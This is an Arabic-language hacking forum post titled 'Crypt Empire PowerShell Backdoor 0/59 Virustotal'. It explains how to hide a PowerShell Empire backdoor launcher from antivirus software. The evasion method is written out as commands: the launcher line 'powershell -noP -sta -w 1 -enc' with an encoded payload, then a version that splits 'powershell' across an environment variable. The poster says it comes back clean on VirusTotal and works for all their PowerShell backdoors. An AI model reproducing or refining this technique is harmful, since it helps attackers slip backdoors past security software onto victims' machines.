26.10.2017 Crypt Empire PowerShell Backdoor 0/59 Virustotal


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
حياكم الله ياشباب
بدون اطاله الاخ ©™ BoubeDZ نزل موضوعه هنا
[ شرح ] - Empire Powershell Part 2 : Creating an Undetectable Backdoor
ان بتفحص الناتج بتشوفه مكشوف من حمايتين الان كاسبر وزون الارم

VirusTotal




الناتج اللي رح تحصله من امباير
C#:
powershell -noP -sta -w 1 -enc  SQBGACgAJABQA
شلت powershell وفحصت الناتج كان كلين
فقلت ليش اننا نقوم بتضمين اسم العملية بشكل مباشر
ليش مانحط متغير يحوي اول جزء من اسم الباور شيل
C#:
set location=power
ومن ثم نستدعيه الامر الموالي يصبح
C#:
%location%shell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFI
يعني power رح نجيبها من متغير وshell رح نخدع بها الانتي فايروسس :15:
منجمعهم مع بعض وسلامتك :39:
النتيجة كلين من الكل على فايروس توتال




VirusTotal

الطريقة جديدة ومن تفكيري ونفعت معي بكل باكدورز الباور شيل
لمشاهدة الشرح من المرفقات
 

المرفقات